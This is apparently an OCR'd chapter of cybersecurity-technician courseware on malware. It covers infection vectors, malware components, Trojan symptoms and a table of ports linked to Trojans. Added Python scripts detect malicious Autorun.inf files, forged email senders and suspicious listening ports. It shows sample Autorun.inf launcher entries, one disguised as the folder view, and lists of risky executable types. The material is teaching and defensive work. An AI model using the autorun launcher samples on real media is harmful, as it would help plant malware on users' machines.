
Chapter 1 - 03 - Define Malware and its Types_fax_ocred.pdf


Full Transcript


Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82

Module Flow: Define Threat Sources; Define Threat Actors/Agents; Define Malware and its Types; Define Vulnerabilities; Understand Different Types of Vulnerabilities.

Define Malware and its Types

To understand the various types of malware and their impact on network and system resources, we begin with the basic concepts of malware. This section describes malware and its types, and highlights the common techniques attackers use to distribute malware on the web.

Module 01 Page 19 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Introduction to Malware

Malware is malicious software that damages or disables computer systems and gives the malware creator limited or full control of those systems for malicious activities such as theft or fraud. Malware includes viruses, worms, Trojans, rootkits, backdoors, botnets, ransomware, spyware, adware, scareware, crapware, roughware, crypters, keyloggers, etc. Such software may delete files, slow down computers, steal personal information, send spam, or commit fraud.
Malware can perform malicious activities ranging from simple email advertising to complex identity theft and password stealing. Malware programmers develop and use malware to:

- Attack browsers and track websites visited
- Slow down systems and degrade system performance
- Cause hardware failure, rendering computers inoperable
- Steal personal information, including contacts
- Erase valuable information, resulting in substantial data loss
- Attack additional computer systems directly from a compromised system
- Spam inboxes with advertising emails

Different Ways for Malware to Enter a System

Overview: instant messenger applications; portable hardware media/removable devices; browser and email software bugs; installation by other malware; untrusted sites and freeware web applications/software; Bluetooth and wireless networks; downloading files from the Internet; email attachments.

Instant Messenger Applications

Infection can occur via instant messenger applications such as Facebook Messenger, WhatsApp Messenger, LinkedIn Messenger, Google Hangouts, or ICQ. Users are at high risk when receiving files via instant messengers. Regardless of who sends the file or from where, there is always a risk of infection by a Trojan, because the user can never be certain who is at the other end of the connection at any given moment. For example, if you receive a file through an instant messenger application from a known person such as Bob, you will be inclined to open and view it.
This could be a trick: an attacker who has hijacked Bob's messenger ID and password may be spreading Trojans across Bob's contact list to trap more victims.

Portable Hardware Media/Removable Devices

- Portable hardware media such as USB drives, DVDs, and external hard drives can also inject malware into a system. The simplest way to inject malware into a target system is through physical access. For example, if Bob can access Alice's system in her absence, he can install a Trojan by copying it from his flash drive onto her hard drive.
- Another means of infection through portable media is the Autorun function. Autorun, also referred to as Autoplay or Autostart, is a Windows feature that, if enabled, runs an executable program when a user inserts a DVD in the DVD-ROM tray or connects a USB device. Attackers exploit this feature to run malware alongside genuine programs: they place an Autorun.inf file together with the malware on a DVD or USB device and trick people into inserting or plugging it into their systems. Because many people are not aware of the risks involved, their machines are vulnerable to Autorun malware. The following is the content of such an Autorun.inf file:

[autorun]
open=setup.exe
icon=setup.exe

Note that Windows 7 and later (and earlier versions with the KB971029 update) no longer run Autorun.inf commands from USB removable drives; they are still honoured from optical media, and the AutoPlay prompt can still present an attacker-chosen file for the user to launch by hand.

To mitigate such infections, turn off the Autostart functionality. Follow the instructions below to turn off Autoplay in Windows 10:

1. Click Start, type gpedit.msc in the Start Search box, and then press ENTER.
2. If you are prompted for an administrator password or confirmation, type the password or click Allow.
3. Under Computer Configuration, expand Administrative Templates, expand Windows Components, and then click Autoplay Policies.
4. In the Details pane, double-click Turn off Autoplay.
5. Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.
6. Restart the computer.

Browser and Email Software Bugs

Outdated web browsers often contain vulnerabilities that pose a major risk to the user's computer. A visit to a malicious site from such a browser can infect the machine without the user downloading or executing any program. The same applies to checking email with Outlook Express or other clients with well-known flaws, which may infect the system without the user even opening an attachment. To reduce such risks, always use the latest version of the browser and email software.

Insecure Patch Management

Unpatched software poses a high risk. Users and IT administrators do not update their application software as often as they should, and attackers take advantage of this well-known fact: they exploit the unpatched vulnerabilities to deliver malware that can damage or exfiltrate the data stored on the company's systems, leading to extensive breaches such as theft of confidential files and company credentials. Some applications that were found to be vulnerable and were patched recently include Google Play Core Library (CVE-2020-8913), Cloudflare WARP for Windows (CVE-2020-35152), Oracle WebLogic Server (CVE-2020-14750), and Apache Tomcat (CVE-2021-24122). Patch management must be effective to mitigate these threats; it is vital to apply patches and update software regularly.

Rogue/Decoy Applications

Attackers can easily lure a victim into downloading free applications/programs.
If a free program claims to offer features such as an address book, access to several POP3 accounts, and other functions, many users will be tempted to try it. POP3 (Post Office Protocol version 3) is an email retrieval protocol.

- If a victim downloads such a free program and marks it as TRUSTED, protection software such as antivirus will not flag the new software. The attacker then receives email, POP3 account passwords, cached passwords, and keystrokes by email without being noticed.
- Attackers thrive on creativity. Consider an attacker who creates a fake website (say, Audio galaxy) for downloading MP3s. He or she could build such a site with 15 GB of space for the MP3s and whatever other systems are needed to create the illusion of a real file-sharing service, fooling users into thinking that they are merely downloading from other network users. However, the client software could act as a backdoor and infect thousands of naive users. Some such sites even link to anti-Trojan software, thereby persuading users to trust them and download infected freeware. A readme.txt file included in the setup can deceive almost any user. Therefore, any freeware site requires proper scrutiny before software is downloaded from it.
- Webmasters of well-known security portals, who maintain vast archives of hacking programs, should act responsibly with regard to the files they provide and scan them often with antivirus and anti-Trojan software to guarantee that their site is free of Trojans and viruses. Suppose that an attacker submits a program infected with a Trojan (e.g., a UDP flooder) to an archive's webmaster. If the webmaster is not alert, the attacker may use this opportunity to infect the files on the site with the Trojan.
- Users who deal with any software or web application should scan their systems daily. If they detect any new file, it is essential to examine it.
If any suspicion arises regarding the file, it is also important to forward it to a malware analysis lab for further analysis.
- It is easy to infect machines using freeware; thus, extra precautions are necessary.

Untrusted Sites and Freeware Web Applications/Software

- A website could be suspicious if it is hosted at a free website provider or offers programs for illegal activities.
- It is highly risky to download programs or tools from "underground" sites, e.g., NeuroticKat software, because they can serve as a conduit for a Trojan attack on the target computer. Users must weigh the high risk of such sites before browsing them.
- Many malicious websites have a professional look, massive archives, feedback forums, and links to other popular sites. Users should scan downloaded files with antivirus software before opening them. Just because a website looks professional does not mean that it is safe.
- Always download popular software from its original (or officially designated mirror) site, and not from third-party sites that link to the (supposedly) same software.

Downloading Files from the Internet

Trojans enter a system when users download Internet-driven applications such as music players, files, movies, games, greeting cards, and screensavers from malicious websites, believing them to be legitimate. Microsoft Word and Excel macros are also used effectively to deliver malware, and downloaded malicious Word/Excel files can infect systems. Malware can also be embedded in audio/video files as well as in video subtitle files.

Email Attachments

An attachment to an email is the most common medium for transmitting malware.
The attachment can be in any form, and the attacker uses innovative ideas to trick the victim into clicking and downloading it. The attachment may be a document, audio file, video file, brochure, invoice, lottery offer letter, job offer letter, loan approval letter, admission form, contract approval, etc.

Example 1: A user's friend is conducting some research, and the user would like to know more about the topic. The user emails the friend to ask about it and waits for a reply. An attacker targeting the user also knows the friend's email address. The attacker merely crafts a message with a forged "From:" field and attaches a Trojan. The user sees the email, assumes the friend has answered the query in the attachment, downloads it, and runs it without considering that it might be a Trojan, resulting in an infection. Some email clients, such as Outlook Express, have had bugs that automatically execute attached files. To avoid such attacks, use secure email services, investigate the headers of emails with attachments, confirm the sender's email address, and download the attachment only if the sender is legitimate.

Network Propagation

Network security is the first line of defense for protecting information systems from hacking incidents. However, factors such as the replacement of network firewalls and operator mistakes may sometimes allow unfiltered Internet traffic into private networks. Malware operators continuously attempt connections to addresses within the Internet address range owned by targets, seeking an opportunity for unfettered access. Some malware propagates directly across networks. For example, the Blaster worm starts from the local machine's IP address or a completely random address and attempts to infect sequential IP addresses.
Although network propagation attacks that exploit vulnerabilities in common network protocols (e.g., SQL Slammer) have not been prevalent recently, the potential for such attacks still exists.

File Sharing Services

If NetBIOS (port 139), FTP (port 21), SMB (port 445), etc., on a system are open for file sharing or remote execution, they can be used by others to access the system. This can allow attackers to install malware and modify system files. Attackers can also use a DoS attack to shut down the system and force a reboot so that the Trojan can restart itself immediately. To prevent such attacks, ensure that the file sharing property is disabled. To disable file sharing in Windows, click Start and type Control Panel. Then, in the results, click the Control Panel option and navigate to Network and Internet > Network and Sharing Center > Change advanced sharing settings. Select a network profile and, under the File and printer sharing section, select Turn off file and printer sharing. This will prevent file sharing abuse.

Installation by Other Malware

A piece of malware with command-and-control functionality will often be able to reconnect to the malware operator's site using common browsing protocols. This allows malware on the internal network to receive both software and commands from the outside. In such cases, the malware installed on one system drives the installation of other malware on the network, compounding the damage.

Bluetooth and Wireless Networks

Attackers use open Bluetooth and Wi-Fi networks to attract users to connect to them.
Such attacker-controlled networks have software and hardware devices installed at the router level to capture network traffic and data packets and to harvest the users' account details, including usernames and passwords.

Common Techniques Attackers Use to Distribute Malware on the Web

Source: Security Threat Report (https://www.sophos.com)

Some standard techniques used to distribute malware on the web are as follows:

- Black hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages.
- Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking innocent-looking links. When clicked, the malware embedded in the link executes without the knowledge or consent of the user.
- Spear-phishing Sites: This technique mimics legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.
- Malvertising: This technique embeds malware-laden advertisements in legitimate online advertising channels, which display across hundreds of high-traffic sites, to spread malware to the systems of unsuspecting users.
- Compromised Legitimate Websites: Attackers often use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware, after which it performs malicious activities.
- Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware when the user merely visits a website.
- Spam Emails: The attacker attaches a malicious file to an email and sends it to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, compromising his/her machine. This is currently the most common method used by attackers. In addition to attachments, an attacker may also embed malicious content in the email body.
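The Autorun.inf layout shown under Portable Hardware Media above is an INI file, so a suspect disc or drive can be inspected for it before it is ever mounted on a production host. The script below is an added example written for this page, not courseware code: it parses an Autorun.inf with Python's configparser, records every entry that would launch a program (open=, shellexecute=, and shell\...\command= keys) and flags an action= text that copies the genuine Windows "Open folder to view files" AutoPlay entry, a trick used to pass a launcher off as the folder view. The three sample files, including the file names in them, are constructed for the example.

```python
"""Inspect an Autorun.inf for entries that would launch a program.

Added example for the Autorun discussion on this page; not courseware code.
The three sample files at the bottom are constructed for this example.
"""
import configparser

# Keys that make Windows launch a program when Autorun is honoured for the medium.
LAUNCH_KEYS = {"open", "shellexecute"}
# The text Windows itself uses for the genuine "open folder" AutoPlay entry; malware
# reuses it in action= so its launcher looks like the harmless folder view.
FOLDER_ACTION = "open folder to view files"


def _launches_program(key: str) -> bool:
    """open=, shellexecute= and shell\\<verb>\\command= all run a command."""
    key = key.lower()
    return key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))


def inspect_autorun(text: str) -> dict:
    """Return the commands an Autorun.inf would run and whether it looks suspicious."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, allow_no_value=True)
    try:
        cp.read_string(text)
    except configparser.Error as exc:          # no [section] header, junk bytes, ...
        return {"launches": [], "spoofed_action": False, "suspicious": False,
                "error": str(exc)}
    launches, spoofed_action = [], False
    for section in cp.sections():
        # [autorun], [autorun.amd64] etc. launch programs; [DeviceInstall] does not.
        if not section.lower().startswith("autorun"):
            continue
        for key, value in cp.items(section):   # configparser lower-cases the keys
            value = (value or "").strip().strip('"')
            if _launches_program(key) and value:
                launches.append((key, value.split()[0]))   # program without its arguments
            if key == "action" and value.lower() == FOLDER_ACTION:
                spoofed_action = True
    return {
        "launches": launches,
        "spoofed_action": spoofed_action,
        "suspicious": bool(launches) or spoofed_action,
    }


# Constructed samples: the file shown on this page, a benign label-only file,
# and a launcher disguised as the folder view (hypothetical file names).
PAGE_SAMPLE = "[autorun]\nopen=setup.exe\nicon=setup.exe\n"
BENIGN = "[AutoRun]\nicon=drive.ico\nlabel=Backup disk\n"
DISGUISED = (
    "[autorun]\n"
    "action=Open folder to view files\n"
    "icon=%SystemRoot%\\system32\\shell32.dll,4\n"
    "shellexecute=RECYCLER\\update.exe /q\n"
)

if __name__ == "__main__":
    for name, sample in (("page", PAGE_SAMPLE), ("benign", BENIGN), ("disguised", DISGUISED)):
        print(name, inspect_autorun(sample))
```

Run it against the autorun.inf read from the suspect medium on an analysis machine with Autorun already disabled; the page's own sample is reported as launching setup.exe, the label-only file as clean, and the disguised file as both launching a program and spoofing the folder action.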
Components of Malware

The components of a malware program depend on the requirements of the malware author, who designs it for a specific target to perform the intended tasks. The usual components are a crypter, downloader, dropper, exploit, injector, obfuscator, packer, payload, and malicious code.

Malware authors and attackers create malware using components that help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly. Some essential components of most malware programs are as follows:

- Crypter: A software program that conceals the existence of malware. Attackers use it to evade antivirus detection.
It protects malware from reverse engineering or analysis, making it difficult for security mechanisms to detect.
- Downloader: A type of Trojan that downloads other malware (or malicious code and files) from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system.
- Dropper: A covert carrier of malware. Attackers embed the malware files inside the dropper, which performs the installation covertly: once the dropper itself has been executed on the target system, it writes the embedded malware to disk and launches it, ideally without being detected by antivirus scanners.
- Exploit: The part of the malware that contains code or a sequence of commands that takes advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach system security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerability abused, exploits are categorized into local exploits and remote exploits.
- Injector: A program that injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal.
- Obfuscator: A program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it.
- Packer: Software that compresses the malware file, converting its code and data into an unreadable format. It uses compression to bundle all of the malware's files into a single executable that evades security software detection.
- Payload: The part of the malware that performs the desired activity when activated and gives the attacker control over the computer system after it has been exploited.
It may be used for deleting or modifying files, degrading system performance, opening ports, changing settings, etc., to compromise system security.
- Malicious Code: A piece of code that defines the basic functionality of the malware, such as stealing data and creating backdoors, and comprises commands that result in security breaches. It can take the following forms: Java Applets; ActiveX Controls; Browser Plug-ins; Pushed Content.

Types of Malware

Malware is a piece of malicious software designed to perform activities intended by the attacker without user consent. It may take the form of executable code, active content, scripts, or other kinds of software. The various types of malware are:

- Trojans
- Viruses
- Ransomware
- Computer Worms
- Rootkits
- PUAs or Grayware
- Spyware
- Keylogger
- Botnets
- Fileless Malware
Trojans

What is a Trojan?

According to ancient Greek mythology, the Greeks won the Trojan War with the aid of a giant wooden horse built to hide their soldiers. The Greeks left this horse in front of the gates of Troy and appeared to withdraw from the war. The Trojans thought the horse was a gift and brought it into their city. At night, the Greek soldiers broke out of the wooden horse and opened the city gates to let in the rest of the Greek army, which destroyed the city of Troy.

Inspired by this story, a computer Trojan is a program in which malicious or harmful code is contained inside an apparently harmless program or data, which can later gain control and cause damage, such as ruining the file allocation table on the hard disk. Attackers use Trojans to trick the victim into performing a predefined action. Trojans are activated upon users' specific predefined actions, such as unintentionally installing malicious software or clicking on a malicious link, and upon activation they can grant attackers unrestricted access to all the data stored on the compromised information system, including a channel back to the attacker for transferring sensitive data, and potentially cause severe damage. For example, users could download a file that appears to be a movie but, when executed, unleashes a program that erases the hard drive or sends credit card numbers and passwords to the attacker.

A Trojan is wrapped within or attached to a legitimate program, meaning that the program may have functionality that is not apparent to the user. Furthermore, attackers use victims as unwitting intermediaries to attack others; they can use a victim's computer to commit illegal DoS attacks.
Trojans run with the same privileges as the victim. For example, if a victim has privileges to delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege elevation attacks), a Trojan that infects that system will possess the same privileges. Furthermore, it can attempt to exploit vulnerabilities to increase its level of access beyond that of the user running it. If successful, the Trojan can use the increased privileges to install other malicious code on the victim's machine.

A compromised system can affect other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or in a trivially encrypted form are particularly vulnerable. If an intruder compromises a system on such a network, he or she may be able to record usernames and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate a remote system as the source of an attack by spoofing, thereby causing the remote system to incur liability.

Trojans enter the system by means such as email attachments, downloads, and instant messages.

Figure 1.2: Depiction of a Trojan attack (the attacker propagates the Trojan over the Internet; the victim downloads the malicious files and is infected; the Trojan can then change or destroy data on the victim's system).
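Email attachments are the first entry vector named above, and the Email Attachments discussion earlier advised investigating the headers of a message with an attachment and confirming the sender before opening it. The script below is an added example written for this page, not courseware code, showing what that check looks like when automated: it parses a message with Python's standard email library, compares the displayed From address with the envelope sender (Return-Path), the Reply-To address and the receiving server's Authentication-Results, and classifies attachments whose file name ends in an executable type, including the double-extension trick. Both messages are constructed in the script with made-up addresses and host names; the MZ bytes in the attachment are a stand-in, not a program.

```python
"""Triage an email with an attachment: sender consistency and attachment type.

Added example for the Email Attachments discussion on this page; not courseware
code. The two messages below are constructed with the standard library for the
example; every address and host name in them is made up.
"""
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr

# Attachment types that are programs in disguise, whatever icon they show.
RISKY_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs",
                  ".hta", ".lnk", ".iso", ".img")


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage_message(raw: str) -> dict:
    """Compare From with the envelope/reply headers and classify attachments."""
    msg = message_from_string(raw, policy=policy.default)
    from_addr = parseaddr(msg.get("From", ""))[1]
    return_path = parseaddr(msg.get("Return-Path", ""))[1]   # envelope sender (MAIL FROM)
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    auth = str(msg.get("Authentication-Results", "")).lower()  # added by the receiving MTA

    findings = []
    if return_path and _domain(return_path) != _domain(from_addr):
        findings.append(f"envelope sender {return_path} does not match the From domain")
    if reply_to and _domain(reply_to) != _domain(from_addr):
        findings.append(f"replies go to {reply_to}, not to the From domain")
    for check in ("spf=fail", "dkim=fail", "dmarc=fail"):
        if check in auth:
            findings.append(f"receiving server reported {check}")

    attachments = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        attachments.append((name, name.lower().endswith(RISKY_SUFFIXES)))

    if any(risky for _, risky in attachments):
        verdict = "quarantine"        # executable content: do not open
    elif findings:
        verdict = "verify-sender"     # confirm out of band before opening
    else:
        verdict = "ok"
    return {"from": from_addr, "findings": findings,
            "attachments": attachments, "verdict": verdict}


def build_sample(return_path: str, reply_to: str, auth: str, filename: str) -> str:
    """Construct a multipart test message (constructed data, not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "Alice Friend <alice@uni.example>"
    msg["To"] = "bob@corp.example"
    msg["Subject"] = "Re: your question about my research"
    msg["Return-Path"] = f"<{return_path}>"
    if reply_to:
        msg["Reply-To"] = reply_to
    msg["Authentication-Results"] = auth
    msg.set_content("Hi Bob, the notes you asked for are attached.")
    msg.add_attachment(b"MZ\x90\x00 not a real program", maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_string()


# Forged "From:" as in Example 1 on this page: the envelope sender, Reply-To and SPF
# all disagree with the displayed sender, and the attachment is a double-extension EXE.
FORGED = build_sample("bounce@mailer.example.net", "alice.research@webmail.example",
                      "mx.corp.example; spf=fail smtp.mailfrom=mailer.example.net; dkim=none",
                      "Research_Notes.pdf.exe")
GENUINE = build_sample("alice@uni.example", "",
                       "mx.corp.example; spf=pass smtp.mailfrom=uni.example; dkim=pass",
                       "research_notes.pdf")

if __name__ == "__main__":
    for label, raw in (("forged", FORGED), ("genuine", GENUINE)):
        print(label, triage_message(raw))
```

The header comparison is only as trustworthy as the Authentication-Results header your own mail server adds; a forged message can carry a forged copy of that header too, so the check belongs at the gateway where the header is written, not only at the desktop.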
Indications of Trojan Attack

The following computer malfunctions are indications of a Trojan attack:

- The DVD-ROM drawer opens and closes automatically.
- The computer screen blinks, flips upside-down, or is inverted so that everything is displayed backward.
- The default background or wallpaper settings change automatically. This can be done using pictures either on the user's computer or in the attacker's program.
- Printers automatically start printing documents.
- Web pages suddenly open without input from the user.
- The color settings of the operating system (OS) change automatically.
- Screensavers change to a personal scrolling message.
- The sound volume suddenly fluctuates.
- Antivirus programs are automatically disabled, and data are corrupted, altered, or deleted from the system.
- The date and time of the computer change.
- The mouse cursor moves by itself.
- The left- and right-click functions of the mouse are interchanged.
- The mouse pointer disappears completely.
- The mouse pointer automatically clicks on icons and is uncontrollable.
- The Windows Start button disappears.
- Pop-ups with bizarre messages suddenly appear.
- Clipboard images and text appear to be manipulated.
- The keyboard and mouse freeze.
- Contacts receive emails from the user's email address that the user did not send.
- Strange warnings or question boxes appear. Often, these are personal messages directed at the user, asking questions that require him/her to answer by clicking a Yes, No, or OK button.
- The system turns off and restarts in unusual ways.
- The taskbar disappears automatically.
- The Task Manager is disabled. The attacker or Trojan may disable the Task Manager so that the victim cannot view the task list or end a given program or process.

How Hackers Use Trojans

Attackers create malicious programs such as Trojans for the following purposes:

- Delete or replace critical OS files
- Generate fake traffic to perform DoS attacks
- Record screenshots, audio, and video of the victim's PC
- Use the victim's PC for spamming and blasting email messages
- Download spyware, adware, and malicious files
- Disable firewalls and antivirus
- Create backdoors to gain remote access
- Infect the victim's PC as a proxy server for relaying attacks
- Use the victim's PC as part of a botnet to perform DDoS attacks
- Steal sensitive information such as:
  - Credit card information, which is useful for domain registration as well as for shopping, captured using keyloggers
  - Account data such as email passwords, dial-up passwords, and web service passwords
  - Important company projects, including presentations and work-related papers
- Encrypt the victim's machine and prevent the victim from accessing it
- Use the target system:
  - To store archives of illegal materials, such as child pornography. The target continues using his/her system without realizing that attackers are using it for illegal activities
  - As an FTP server for pirated software
- Script kiddies may just want to have fun with the target system; an attacker could plant a Trojan just to make the system act strangely (e.g., the DVD tray opens and closes frequently, the mouse functions improperly, etc.)
- The attacker might use a compromised system for other illegal purposes such that the target would be held responsible if these illegal activities are discovered by the authorities
Common Ports used by Trojans

Ports represent the entry and exit points of data traffic. There are two types of ports: hardware ports and software ports. Ports within the OS are software ports, and they are usually entry and exit points for application traffic (e.g., port 25 is associated with SMTP for e-mail routing between mail servers). Many existing ports are application-specific or process-specific. Various Trojans use some of these ports to infect target systems.

Users need a basic understanding of the state of an "active connection" and of the ports commonly used by Trojans to determine whether a system has been compromised. Among the various states, the "listening" state is the important one in this context. The system generates this state when it listens on a port number while waiting for a connection from another system. Whenever a system reboots, Trojans move to the listening state; some use more than one port: one for "listening" and the other(s) for data transfer. Common ports used by different Trojans are listed in the table below.
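The listening-port check described above, as an added example that is not part of the EC-Council material: it parses constructed Windows netstat -ano output, matches TCP listeners against a small excerpt of Table 1.1 (below), and ignores ports this host is expected to serve, since shared ports such as 80, 443 and 445 appear in the table as well. The EXPECTED_LISTENERS allowlist is an assumption for the example; a real check would take it from the host's build standard.

```python
"""Flag TCP listeners on Trojan-associated ports in netstat -ano output.

Added example (not EC-Council's code). TROJAN_PORTS is an excerpt of
Table 1.1; EXPECTED_LISTENERS and the netstat text are constructed.
"""
import re
from collections import defaultdict

# Excerpt of Table 1.1: port -> Trojans reported to use it.
TROJAN_PORTS = {
    80: "Poison Ivy, POWERSTATS, Necurs, NetWire (and many others)",
    443: "gh0st RAT, TrickBot, Cardinal RAT (and many others)",
    445: "WannaCry, Petya, Dragonfly 2.0",
    1604: "DarkComet RAT, Pandora RAT, HellSpy",
    1863: "XtremeRAT",
    5000: "Bubbel, SpyGate RAT, Punisher RAT",
    12345: "GabanBus, NetBus",
    12346: "GabanBus, NetBus",
    31337: "Back Orifice, Deep BO",
    31338: "Back Orifice, Deep BO",
    54321: "SchoolBus .69-1.11",
}

# Assumption for the example: this host legitimately serves HTTP, HTTPS and
# SMB. Those ports are in Table 1.1 too, so a bare port match is not evidence
# of compromise; only listeners outside the allowlist are flagged.
EXPECTED_LISTENERS = {80, 443, 445}

# One "netstat -ano" row in the LISTENING state: the local address may be IPv4
# ("0.0.0.0:80") or bracketed IPv6 ("[::]:80"); the last column is the PID.
LISTEN_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def listening_ports(netstat_text):
    """Return [(port, pid)] for every TCP LISTENING line."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            found.append((int(m.group(1)), int(m.group(2))))
    return found


def find_suspicious_listeners(netstat_text, expected=EXPECTED_LISTENERS):
    """Listeners on Table 1.1 ports that this host is not expected to run."""
    flags = []
    for port, pid in listening_ports(netstat_text):
        if port in TROJAN_PORTS and port not in expected:
            flags.append({"port": port, "pid": pid, "trojans": TROJAN_PORTS[port]})
    return sorted(flags, key=lambda f: f["port"])


def group_by_pid(flags):
    """Ports per process: a Trojan may hold one listening port plus others
    for data transfer, so several flagged ports under one PID stand out."""
    by_pid = defaultdict(list)
    for f in flags:
        by_pid[f["pid"]].append(f["port"])
    return {pid: sorted(ports) for pid, ports in by_pid.items()}


# Constructed sample output; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1604           0.0.0.0:0              LISTENING       3120
  TCP    [::]:12345             [::]:0                 LISTENING       3120
  TCP    192.0.2.10:49700       198.51.100.7:443       ESTABLISHED     5532
  UDP    0.0.0.0:68             *:*                                    1188
"""

if __name__ == "__main__":
    flagged = find_suspicious_listeners(SAMPLE_NETSTAT)
    for f in flagged:
        print("port %5d  pid %5d  %s" % (f["port"], f["pid"], f["trojans"]))
    print("ports per PID:", group_by_pid(flagged))
```

The established connection to 443 and the UDP socket are not listeners and are left alone; confirmation still needs the owning process and its binary, not the port alone.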
Port                   Trojan
2                      Death
20/22/80/443           Emotet
21                     Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash, DarkFTP
21/3024/4092/5742      WinCrash
22                     Shaft, SSH RAT, Linux Rabbit
23                     Tiny Telnet Server, EliteWrap
25                     Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Haebu Coceda, Shtrilitz Stealth, Kuang2 0.17A-0.30, Jesrto, Lazarus Group, Mis-Type, Night Dragon
26                     BadPatch
31/456                 Hackers Paradise
53                     Denis, Ebury, FIN7, Lazarus Group, RedLeaves, Threat Group-3390, Tropic Trooper
68                     Mspy
80                     Necurs, NetWire, Ismdoor, Poison Ivy, Executer, Codered, APT 18, APT 19, APT 32, BBSRAT, Calisto, Carbanak, Carbon, Comnie, Empire, FIN7, InvisiMole, Lazarus Group, MirageFox, Mis-Type, Misdat, Mivast, MoonWind, Night Dragon, POWERSTATS, RedLeaves, SType, Threat Group-3390, UBoatRAT
113                    Shiver
139                    Nuker, Dragonfly 2.0
421                    TCP Wrappers Trojan
443                    ADVSTORESHELL, APT 29, APT 3, APT 33, AuditCred, BADCALL, BBSRAT, Bisonal, Briba, Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER, Empire, FELIXROOT, FIN7, FIN8, gh0st RAT, HARDRAIN, Hi-Zor, HOPLIGHT, KEYMARBLE, Lazarus Group, LOWBALL, Mis-Type, Misdat, MoonWind, Naid, Nidiran, Pasam, PlugX, PowerDuke, POWERTON, Proxysvc, RATANKBA, RedLeaves, S-Type, TEMP.Veles, Threat Group-3390, TrickBot, Tropic Trooper, TYPEFRAME, UBoatRAT
445                    WannaCry, Petya, Dragonfly 2.0
456                    Hackers Paradise
555                    Ini-Killer, Phase Zero, Stealth Spy
666                    Satanz Backdoor, Ripper
1001                   Silencer, WebEx
1011                   Doly Trojan
1095-98                RAT
1170                   Psyber Stream Server, Voice
1177                   njRAT
1234                   Ultors Trojan
1234/12345             Valvo line
1243                   SubSeven 1.0-1.8
1243/6711/6776/27374   Sub Seven
1245                   VooDoo Doll
1349                   Back Office DLL
1433                   Misdat
1492                   FTP99CMP
1600                   Shivka-Burka
1604                   DarkComet RAT, Pandora RAT, HellSpy
1777                   Java RAT, Agent.BTZ/ComRat, Adwind
1807                   SpySender
1863                   XtremeRAT
1981                   Shockrave
1999                   BackDoor 1.00-1.03
2001                   Trojan Cow
2140                   The Invasor
2140/3150              DeepThroat
2155                   Illusion Mailer, Nirvana
2801                   Phineas Phucker
3129                   Masters Paradise
3131                   SubSari
3150                   The Invasor
3389                   RDP
4567                   File Nail 1
4590                   ICQTrojan
5000                   Bubbel, SpyGate RAT, Punisher RAT
5001/50505             Sockets de Troie
5321                   FireHotcker
5400-02                Blade Runner / Blade Runner 0.80 Alpha
5569                   Robo-Hack
6267                   GW Girl
6400                   Thing
6666                   KilerRat, Houdini RAT
6667/12349             Bionet, Magic Hound
6670-71                DeepThroat
6969                   GateCrasher, Priority
7000                   Remote Grab
7300-08                NetMonitor
7300/31338/31339       Net Spy
7597                   Qaz
7626                   Gdoor
7777                   GodMsg
7789                   ICKiller
8000                   BADCALL, Comnie, Volgmer
8012                   Ptakks
8080                   Zeus, APT 37, Comnie, EvilGrab, FELIXROOT, FIN7, HTTPBrowser, Lazarus Group, Magic Hound, OceanSalt, SType, Shamoon, TYPEFRAME, Volgmer
8443                   FELIXROOT, Nidiran, TYPEFRAME
8787/54321             BackOrifice 2000
9989                   iNi-Killer
10048                  Delf
10100                  Gift
10607                  Coma 1.0.9
11000                  Senna Spy
11223                  Progenic Trojan
12223                  Hack'99 KeyLogger
12345-46               GabanBus, NetBus
12361/12362            Whack-a-mole
16969                  Priority
20001                  Millennium RAT
21544                  GirlFriend 1.0, Beta-1.35
22222                  Prosiak
23432                  Asylum
23456                  Evil FTP, Ugly FTP
25685                  Moon Pie
26274                  Delta
29222                  RuX
30100-02               NetSphere 1.27a
31337-38               Back Orifice / Back Orifice 1.20 / Deep BO
31338                  DeepBO
31339                  NetSpy DK
31666                  BOWhack
34324                  BigGluck, TN
40412                  The Spy
40421-26               Masters Paradise
47262                  Delta
50766                  Fore
54321                  SchoolBus .69-1.11
